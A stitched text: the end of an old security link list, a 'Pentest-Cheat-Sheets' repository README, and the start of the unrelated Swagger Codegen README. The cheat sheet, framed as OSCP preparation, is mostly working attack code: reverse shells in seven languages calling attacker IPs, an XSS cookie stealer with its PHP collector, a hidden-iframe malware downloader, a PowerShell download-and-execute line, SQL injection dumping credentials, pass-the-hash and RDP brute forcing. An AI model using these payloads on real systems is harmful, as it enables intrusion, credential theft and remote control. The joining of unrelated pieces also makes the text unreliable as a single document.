Http://www.nosec.org/2010/0809/629.html
http://h30507.www3.hp.com/t5/Following-the-White-Rabbit-A/Adobe-ColdFusion-s-Directory-Traversal-Disaster/ba-p/81964
http://cfunited.com/2009/files/presentations/254_ShlomyGantz_August2009_HackProofingColdFusion.pdf
## SHAREPOINT
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6131.msg32678/#msg32678
## LOTUS
http://blog.ombrepixel.com/post/2009/05/06/Lotus-Notes/Domino-Security
http://seclists.org/pen-test/2002/Nov/43
Http://www.sectechno.com/2010/07/12/hacking-lotus-domino/?
## JBOSS
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
Http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
## VMWARE WEB
Http://www.metasploit.com/modules/auxiliary/scanner/http/vmware_server_dir_trav
## ORACLE APP SERVERS
Http://www.hideaway.net/2007/07/hacking-oracle-application-servers.html
http://www.owasp.org/index.php/Testing_for_Oracle
Http://www.ngssoftware.com/services/software-products/internet-security/orascan.aspx
http://www.ngssoftware.com/services/software-products/Database-Security/NGSSQuirreLOracle.aspx
Http://www.ngssoftware.com/papers/hpoas.pdf
## SAP
Http://www.onapsis.com/research.html#bizploit
Http://marc.info/?l=john-users&m=121444075820309&w=2
http://www.phenoelit-us.org/whatSAP/index.html
## WIRELESS
Http://code.google.com/p/pyrit/
## CAPTURE THE FLAG/WARGAMES
Http://intruded.net/
Http://smashthestack.org/
Http://flack.hkpco.kr/
Http://ctf.hcesperer.org/
Http://ictf.cs.ucsb.edu/
Http://capture.thefl.ag/calendar/
## MISC/UNSORTED
http://www.ikkisoft.com/stuff/SMH_XSS.txt
Http://securestate.blogspot.com/2010/08/xfs-101-cross-frame-scripting-explained.html?utm_source=twitterfeed&utm_medium=twitter
Http://whatthefuckismyinformationsecuritystrategy.com/
Http://video.google.com/videoplay?docid=4379894308228900017&q=owasp#
http://video.google.com/videoplay?docid=4994651985041179755&ei=_1k4TKj-PI-cqAPioJnKDA&q=deepsec#
Http://www.sensepost.com/blog/4552.html
Http://blog.zenone.org/2009/03/pci-compliance-disable-sslv2-and-weak.html
Http://threatpost.com/en_us/blogs/hd-moore-metasploit-exploitation-and-art-pen-testing-040210
Http://carnal0wnage.attackresearch.com/node/410
Http://www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf
http://www.spy-hunter.com/Database_Pen_Testing_ISSA_March_25_V2.pdf
Http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks/
|
<p align="center">
<img src="https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/blob/master/CheatSheets/28533648.png" alt="Pentest Cheat Sheets" width="300" />
</p>
<p align="center">
Pentest-Cheat-Sheets<br>
@n3k00n3 | @UserXGnu | @alacerda
</p>
This repo has a collection of snippets of codes and commands to help our lives!
The main purpose is not be a crutch, this is a way to do not waste our precious time!
This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.
## Ninja Tricks
- [Recon](#recon)
- [DNS](#dns)
- [SPF](#spf-recon)
- [Nmap](#nmap)
- [NetCat](#netcat)
- [SNMP](#SNMP)
- [Mysql](#mysql)
- [MS SQL](#ms-sql)
- [Web Enumeration](#web-enumeration)
- [Exploitation](#exploitation)
- [System Network](#system-network)
- [RDP](#rdp)
- [Pass The Hash](#pass-the-hash)
- [Windows-Shell](#windows-shell)
- [Web Application](#web-application)
- [Web Remote Code Execution](#web-remote-code-execution)
- [LFI](#lfi)
- [encode](#encode)
- [XSS](#xss)
- [SQLi](#sqli)
- [sqlmap](#sqlmap)
- [Bare Hands](#bare-hands)
- [Jekins](#jekins)
- [Post-exploitation](#post-exploitation)
- [Reverse Shell](#reverse-shell)
- [PHP Reverse Shell](#php-reverse-shell)
- [Perl Reverse Shell](#perl-reverse-shell)
- [python Reverse Shell](#python-reverse-shell)
- [Ruby Reverse Shell](#ruby-reverse-shell)
- [bash Reverse Shell](#bash-reverse-shell)
- [powershell Reverse Sheel](#powershell-reverse=shell)
- [Java Reverse Sheel](#java-reverse=shell)
- [Xterm Reverse Sheel](#xterm-reverse=shell)
- [Linux](#linux)
- [Linux Privilege Escalation](#linux-privilege-escalation)
- [Data Haversting and Enumeration](#data-harvesting-enumeration)
- [Linux Pivot](#linux-pivot)
- [Sshutle](#sshutle)
- [VPNPivot](#vpn-pivot)
- [SSH Tunneling](#ssh-tunneling)
- [Linux Backdoring](#linux-backdoring)
- [Windows](#Windows)
- [Windows Enumeration](#windows-enumeration)
- [Windows Privilege Escalation](#windows-privilege-escalation)
- [Hashdump](#hashdump)
- [Transferring Files Without Metasploit](#transferring-files-without-metasploit)
- [Backdoring](#windows-backdoring)
- [Windows Pivot](#windows-pivot)
- [Openssh for Tunneling](#openssh-for-tunneling)
- [Plink](#plink)
- [Resources](#resources)
- [HTTP/HTTPS Servers](#http-server)
- [Wordlist](#wordlist)
- [seclist](#seclist)
- [cotse](#cotse)
- [PacketStorm](#packetstorm)
- [Default Passwords](#default-passwords)
- [Default Passoword](#default-password)
- [Router Password](#Router-password)
- [Leak](#leak)
- [Pastebin](#pastebin)
- [Tables](#tables)
- [Contribution](#contribution)
# Recon
## DNS
### Nslookup
Resolve a given hostname to the corresponding IP.
```shell
nslookup targetorganization.com
```
### Reverse DNS lookup
```shell
nslookup -type=PTR IP_address
```
### MX(Mail Exchange) lookup
```shell
nslookup -type=MX domain
```
### Zone Transfer
#### Using nslookup Command
```shell
nslookup
server domain.com
ls -d domain.com
```
#### Using HOST Command
host -t ns(Name Server) < domain >
```shell
host -t ns domain.com
```
after that test nameservers
host -l < domain > < nameserver >
```shell
host -l domain.com ns2.domain.com
```
### Nmap Dns Enumaration
```
nmap -F --dns-server <dns server ip> <target ip range>
```
### Auto tools
#### DNSenum
```
dnsenum targetdomain.com
```
```
dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com
```
#### DNSmap
```bash
targetdomain.com
```
```bash
dnsmap targetdomain.com -w <Wordlst file.txt>
```
Brute Force, the file is saved in /tmp
```bash
dnsmap targetdomain.com -r
```
#### DNSRecon DNS Brute Force
```bash
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
```
#### Fierce.pl
```
fierce -dns targetdomain.com
```
#### HostMap
```
hostmap.rb -only-passive -t <IP>
```
We can use -with-zonetransfer or -bruteforce-level
##
## SPF Recon
### Dig SPF txt
```bash
dig txt target.com
```
#### Dmarc
```bash
dig TXT _dmarc.example.org
```
#### Online Tools
- https://dnsdumpster.com/
- https://network-tools.com/nslook/
- https://www.dnsqueries.com/en/
- https://mxtoolbox.com/
##
## Nmap
Set the ip address as a varible
`export ip=192.168.1.100`
`export netw=192.168.1.0/24`
### Detecting Live Hosts
Only Ip's
```shell
nmap -sn -n $netw | grep for | cut -d" " -f5
```
### Stealth Scan
```shell
nmap -sS $ip
```
Only Open Ports and Banner Grab
```shell
nmap -n -Pn -sS $ip --open -sV
```
Stealth scan using FIN Scan
```shell
map -sF $ip
```
### Agressive scan
Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports
```shell
nmap -n -Pn -sS -A $ip --open -p-
```
Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services
```shell
nmap –v –sS –A –T4 $ip
```
### OS FigerPrint
```shell
nmap -O $ip
```
### Quick Scan
```shell
nmap -T4 -F $netw
```
### Quick Scan Plus
```shell
nmap -sV -T4 -O -F --version-light $netw
```
### output to a file
```shell
nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip
```
### output to a file Plus
```shell
nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw
```
### Search NMAP scripts
```shell
ls /usr/share/nmap/scripts/ | grep ftp
```
- [Nmap Discovery](https://nmap.org/nsedoc/categories/discovery.html)
##
## NetCat
### Port Scanner
One port
```shell
nc -nvz 192.168.1.23 80
```
Port Range
```shell
nc -vnz 192.168.1.23 0-1000
```
### Send files
- Server
```shell
nc -lvp 1234 > file_name_to_save
```
- Client
```shell
nc -vn 192.168.1.33 1234 < file_to_send
```
### Executing remote script
- Server
```shell
nc -lvp 1234 -e ping.sh <IP>
```
- Client
```shell
nc -vn 192.168.1.33 1234
```
### Chat with encryption
- Server
```shell
ncat -nlvp 8000 --ssl
```
- Client
```shell
ncat -nv 192.168.1.33 8000
```
### Banner Grabbing
- Request
```shell
nc target port
HTTP_Verb path http/version
Host: url
```
- Response
```shell
nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br
```
### If this site uses https you need to use openssl
```shell
openssl s_client -quiet www.bla.com.br:443
```
##
## SNMP
### Fixing SNMP output
```shell
apt-get install snmp-mibs-downloader download-mibs
```
```shell
echo "" > /etc/snmp/snmp.conf
```
### OneSixtyone
onesixtyone -c COMMUNITY_FILE -i Target_ip
```shell
onesixtyone -c community.txt -i Found_ips.txt
```
### snmpwalk
Walking MIB's
snmpwalk -c COMMUNITY -v VERSION target_ip
```shell
snmpwalk -c public -v1 192.168.25.77
```
specific MIB node
snmpwalk -c community -v version Target IP MIB Node
Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25
```shell
snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25
```
### snmp-check
snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY
```shell
snmp-check -t 172.20.10.5
```
```shell
snmp-check -t 172.20.10.5 -c public
```
### Automate the username enumeration process for SNMPv3
```shell
apt-get install snmp snmp-mibs-downloader
```
```shell
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
```
### NMAP SNMPv3 Enumeration
```shell
nmap -sV -p 161 --script=snmp-info 172.20.10.0/24
```
### Default Credentials
```shell
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
```
##
## MYSQL
### Try remote default Root access
Mysql Open to wild
```shell
mysql -h Target_ip -u root -p
```
## MSSQL
### MSQL Information Gathering
```
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
```
## Web Enumeration
### Dirsearch
```shell
dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old
```
```shell
dirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist
```
```shell
dirsearch -u https://target.com -e .
```
### dirb
```shell
dirb http://target.com /path/to/wordlist
```
```shell
dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old
```
### Gobuster
```shell
gobuster -u https://target.com -w /usr/share/wordlists/dirb/big.txt
```
##
# Exploitation
## System Network
## RDP
### xfreerdp
##### Simple User Enumeration for Windows Target (kerberos based)
xfreerdp /v:<target_ip> -sec-nla /u:""
```
xfreerdp /v:192.168.0.32 -sec-nla /u:""
```
### login
xfreerdp /u:<user> /g:<domain> /p:<pass> /v:<target_ip>
```
xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34
```
#### Wordlist based bruteforce
### NCRACK
ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> <target_ip>:3389
```
ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389
```
### Crowbar
crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s <target_ip>/32 -v
```
crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -v
```
## Pass the hash
### Smb pass the hash
#### Tool:
[pth-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
### Listing shared folders
sudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 -L <target_ip> \\\\<target_ip>\\ <hash>
```
sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L 192.168.0.24 \\\\192.168.0.24\\ ljahdçjkhadkahdkjahsdlkjahsdlkhadklad
```
### Interactive smb shell
sudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 \\\\<target_ip>\\shared_folder <hash>
```
sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\192.168.0.24\\folder ljahdçjkhadkahdkjahsdlkjahsdlkhadklad
```
## Web Application
### Web Remote code
### LFI (Local File Inclusion)
Situation
```
http://<target>/index.php?parameter=value
```
#### How to Test
```
http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index
```
```
http://<target>/script.php?page=../../../../../../../../etc/passwd
```
```
http://<target>/script.php?page=../../../../../../../../boot.ini
```
#### LFI Payloads
- [Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders)
- [Seclist LFI Intruder](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### encode
## XSS
### Reflected
#### Simple test
This is a simple test to see what happens, this is not a prove that the field is vuln to xss
```javascript
<plaintext>
```
#### Simple XSS test
```javascript
<script>alert('Found')</script>
```
```javascript
"><script>alert(Found)</script>">
```
```javascript
<script>alert(String.fromCharCode(88,83,83))</script>
```
#### Bypass filter of tag script
`" onload="alert(String.fromCharCode(88,83,83))`
```javascript
" onload="alert('XSS')
```
bla is not a valid image, so this cause an error
```javascript
<img src='bla' onerror=alert("XSS")>
```
### Persistent
```javascript
>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>";
```
### PHP collector
`> cookie.txt`
`chmod 777 cookie.txt`
edit a php page like colector.php as follow:
```php
<?php
$cookie=GET['cookie'];
$useragent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('cookie.txt', 'a');
fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n");
fclose($file);
?>
```
Script to put in page:
```javascript
<scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script>
```
#### Malware Donwloader via XSS
```javascript
<iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe>
```
#### How to play Mario with XSS
```javascript
<iframe
src="https://jcw87.github.io/c2-smb1/"
width="100%"
height="600"
></iframe>
```
```javascript
<input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')" autofocus>
```
#### XSS payloads
- [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection)
- [Seclist XSS](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/XSS)
## SQLI
Sql Injection
### Sqlmap
#### GET
#### Error-Based
#### Simple test
`Adding a simpe quote '`
Example:
```javascript
http://192.168.1.104/Less-1/?id=5'
```
#### List databases
```bash
./sqlmap.py -u http://localhost/Less-1/?id=1 --dbs
```
#### List tables
```bash
./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name --tables
```
#### List columns
```bash
./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --columns
```
#### Dump all
```bash
./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --dump-all
```
#### Set Cookie
```bash
./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
```
#### Checking Privileges
```bash
./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE
```
#### Reading file
```bash
./sqlmap.py -u <URL> --file-read=<file to read>
```
```bash
./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd
```
#### Writing file
```
./sqlmap.py -u <url> --file-write=<file> --file-dest=<path>
```
```
./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/html/shell-php.php
```
#### POST
```bash
./sqlmap.py -u <POST-URL> --data="<POST-paramters> "
```
```bash
./sqlmap.py -u http://localhost/Less-11/ --data "uname=teste&passwd=&submit=Submit" -p uname
```
You can also use a file like with the post request:
```bash
./sqlmap.py -r post-request.txt -p uname
```
### Bare Hands
#### GET
#### Error-Based
#### Simple test
`Adding a simpe quote '`
Example:
```
http://192.168.1.104/Less-1/?id=5'
```
#### Fuzzing
Sorting columns to find maximum column
`http://192.168.1.104/Less-1/?id=-1 order by 1`
`http://192.168.1.104/Less-1/?id=-1 order by 2`
`http://192.168.1.104/Less-1/?id=-1 order by 3`
(until it stop returning errors)
---
#### Finding what column is injectable
**mysql**
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, 3`
(using the same amount of columns you got on the previous step)
**postgresql**
`http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, NULL`
(using the same amount of columns you got on the previous step)
one of the columns will be printed with the respective number
---
#### Finding version
**mysql**
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, version()`
**postgres**
`http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, version()`
#### Finding database name
**mysql**
`http://192.168.1.104/Less-1/?id=-1 union select 1,2, database()`
**postgres**
`http://192.168.1.104/Less-1/?id=-1 union select NULL,NULL, database()`
#### Finding usernames logged in
**mysql**
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, current_user()`
#### Finding databases
**mysql**
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata`
**postgres**
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, datname from pg_database`
#### Finding table names from a database
**mysql**
```
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"
```
**postgres**
```
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog="database_name"
```
#### Finding column names from a table
**mysql**
```
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"
```
**postgres**
```
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog="database_name" and table_name="tablename"
```
#### Concatenate
Example:
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login from users;`
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, password from users;`
in one query
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql**
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres**
### Error Based SQLI (USUALLY MS-SQL)
#### Current user
`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--`
#### DBMS version
`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--`
#### Database name
`http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 --`
#### Tables from a database
`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--`
---
`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--`
#### Columns within a table
`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--`
> remember to change **dbname** and **tablename** accordingly with the given situation
> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--`
#### Actual data
`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--`
> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--`
#### Shell commands
`EXEC master..xp_cmdshell <command>`
> you need yo be 'sa' user
#### Enabling shell commands
`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;`
### Jenkins
##
# Post Exploitation
## Reverse Shell
### PHP Reverse Shell
```php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```
Tiny Reverse Shell
```php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'");
```
### Perl Reverse Shell
```perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
### Python Reverse Shell
```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
### Ruby Reverse Shell
```ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```
### Bash Reverse Shell
```bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```
### Powershell Reverse Shell
Create a simple powershell script called reverse.ps1:
```powershell
function reverse_powershell {
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}
```
```powershell
powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powershell"
```
### Java Reverse Shell
```java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
### Xterm Reverse Shell
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
```bash
xterm -display 10.0.0.1:1
```
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
```bash
Xnest :1
```
You’ll need to authorise the target to connect to you (command also run on your host):
```bash
xhost +targetip
```
##
## Linux
## Windows
### Transferring Files Without Metasploit
#### Powershell
Download files with powershell
```powershell
powershell -c "Invoke-WebRequest -uri 'http://Your-IP:Your-Port/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
```
```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
```
```powershell
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"
```
Creating a server with python3
```shell
python -m http.server
```
Creating a server with python2
```shell
python -m SimpleHTTPServer 80
```
#### FTP
You need to create a FTP server
- Server Linux
Allow anonymous
```shell
python -m pyftpdlib -p 21 -u anonymous -P anonymous
```
- Windows Client
```shell
ftp
open target_ip port
open 192.168.1.22 21
```
we can simply run ftp -s:ftp_commands.txt and we can download a file with no user interaction.
like this:
```shell
C:\Users\kitsunesec\Desktop>echo open 10.9.122.8>ftp_commands.txt
C:\Users\kitsunesec\Desktop>echo anonymous>>ftp_commands.txt
C:\Users\kitsunesec\Desktop>echo whatever>>ftp_commands.txt
C:\Users\kitsunesec\Desktop>ftp -s:ftp_commands.txt
```
#### Apache Server
- server
Put your files into /var/www/html
```shell
cp nc.exe /var/www/html
systemctl start apache2
```
- client
Get via web browser, wget or powershell...
### Windows Pivoting
#### Openssh for Tunneling
Once you got SYSTEM on the target machine. download: [openssh_for_windows](https://github.com/PowerShell/Win32-OpenSSH/releases)
```powershell
powershell -command "Expand-Archive 'C:\<path-to-zipped-openssh>\openssh.zip' c:\<path-to-where-you-whereever-you-want\"
```
Then install it:
```powershell
powershell -ExecutionPolicy Bypass -File c:\<path-to-unzipped-openssh-folder>\install-sshd.ps1
```
Now if you need, just adjust the firewall rules to your needs:
```powershell
powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
```
Start the sshd service:
```powershell
net start sshd
```
After these steps a regular ssh tunnel would sufice:
From your linux machine:
```bash
$ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip>
```
done you have now a socks to tunnel through!!
##
# Resources
##
#### HTTP/HTTPS Servers
HTTPS using Python
Create the Certificate:
```
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
```
Start the HTTPS Server
```
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
```
## Wordlists
- Wordlists
- [PacketStorm](https://packetstormsecurity.com/Crackers/wordlists/dictionaries/)
- [SecList](https://github.com/danielmiessler/SecLists)
- [cotse](http://www.cotse.com/tools/wordlists1.htm)
- Default Password
- [DefaultPassword](http://www.defaultpassword.com/)
- [RouterPassword](http://www.routerpasswords.com/)
- Leak
- [Pastebin](https://pastebin.com)
- Tables
- [RainbowCrack](https://project-rainbowcrack.com/table.htm)
##
## Contribution
[HOW TO](https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets/tree/master/contribution.md)
|
# Swagger Code Generator
[![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen)
[![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea)
[![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project)
[![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen)
:star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star:
:notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover:
:warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning:
:rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket:
## Overview
This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported:
- **API clients**: **ActionScript**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, Node)
- **Server stubs**: **C#** (ASP.NET Core, NancyFx), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra)
- **API documentation generators**: **HTML**, **Confluence Wiki**
- **Others**: **JMeter**
Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project.
# Table of contents
- [Swagger Code Generator](#swagger-code-generator)
- [Overview](#overview)
- [Table of Contents](#table-of-contents)
- Installation
- [Compatibility](#compatibility)
- [Prerequisites](#prerequisites)
- [OS X Users](#os-x-users)
